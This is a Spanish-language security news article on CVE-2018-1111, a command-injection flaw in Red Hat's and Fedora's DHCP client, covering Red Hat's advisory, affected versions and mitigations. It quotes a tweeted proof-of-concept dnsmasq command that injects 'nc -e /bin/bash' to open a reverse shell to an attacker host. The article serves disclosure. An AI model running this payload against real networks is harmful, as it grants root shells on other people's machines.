Vulnerabilidad CVE-2018-1111 podrían permitir ejecutar comandos arbitrarios en clientes DHCP

DHCP

Un investigador de seguridad de Google descubrió una vulnerabilidad crítica de inyección remota de comandos en cliente DHCP de Red Hat Linux y sus derivados, como el sistema operativo Fedora.

La vulnerabilidad, rastreada como CVE-2018-1111, podría permitir a los atacantes ejecutar comandos arbitrarios con privilegios de administrador en sistemas específicos.

Siempre que su sistema se una a una red, es la aplicación cliente DHCP la que le permite a su sistema recibir automáticamente parámetros de configuración de red, como una dirección IP y servidores DNS, desde el servidor DHCP (Protocolo de control de host dinámico).

La vulnerabilidad reside en el script de integración de NetworkManager incluido en los paquetes de cliente DHCP que está configurado para obtener la configuración de red utilizando el protocolo DHCP.

Felix Wilhelm, del equipo de seguridad de Google, descubrió que los atacantes con un servidor DHCP malicioso o conectados a la misma red que la víctima pueden explotar esta falla falsificando las respuestas DHCP, lo que les permite ejecutar comandos arbitrarios con privilegios de administrador en el sistema de la víctima. cliente DHCP vulnerable

Aunque no se han publicado todos los detalles de la vulnerabilidad, Wilhelm afirma que su código de exploits PoC es tan corto que incluso puede caber en un tweet.

Mientras tanto, Barkın Kılıç, un investigador de seguridad de Turquía, ha lanzado un código de exploits tweetable de prueba de concepto para la vulnerabilidad del cliente DHCP de Red Hat Linux en Twitter.
redhat-dhcp-exploit

#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat pic.twitter.com/vUICm2HluC

— Barkın Kılıç (@Barknkilic) 15 de mayo de 2018

'Por otra parte Red Hat han sido informada de una vulnerabilidad que afecta a los paquetes de cliente DHCP tal como se suministra con Red Hat Enterprise Linux 6 y 7. Esta vulnerabilidad CVE-2018-1111 fue calificada como un impacto de seguridad de Critical. Un servidor DHCP malicioso, o un atacante en la red local capaz de falsificar respuestas DHCP, podría usar esta falla para ejecutar comandos arbitrarios con privilegios de administrador en sistemas que usan NetworkManager y configurados para obtener la configuración de red usando el protocolo DHCP'.

Red Hat Enterprise Virtualization 4.1 incluye los componentes vulnerables, pero la configuración predeterminada no se ve afectada porque NetworkManager está desactivado en el dispositivo de administración y no se usa junto con DHCP. Los clientes aún pueden obtener los paquetes actualizados de los canales de Red Hat Enterprise Linux utilizando la actualización yum, o actualizar a Red Hat Enterprise Virtualization 4.2, que incluye los paquetes fijos.

Red Hat Enterprise Virtualization 3.6 no es vulnerable ya que no usa DHCP.

    'Los usuarios tienen la opción de eliminar o desactivar el script vulnerable, pero esto evitará que ciertos parámetros de configuración proporcionados por el servidor DHCP se configuren en un sistema local, como las direcciones de los servidores NTP o NIS locales', advierte Red Hat.


Fedora también ha lanzado nuevas versiones de paquetes DHCP que contienen correcciones para Fedora 26, 27 y 28.

Otras distribuciones populares de Linux como OpenSUSE y Ubuntu no parecen verse afectadas por la vulnerabilidad, ya que su implementación de cliente DHCP no tiene el script de integración de NetworkManager de manera predeterminada.

Síguenos en FacebookTwitterunete a nuestra charla en Riotúnete a IRC o únete a Telegram y no olvides compartirnos en las redes sociales. También puede hacernos una donación o comprar nuestros servicios.

Etiquetas

Acerca del autor

Pentesting. Estudiante de ingeniería en sistemas y mantenimiento de sistemas informáticos. UNA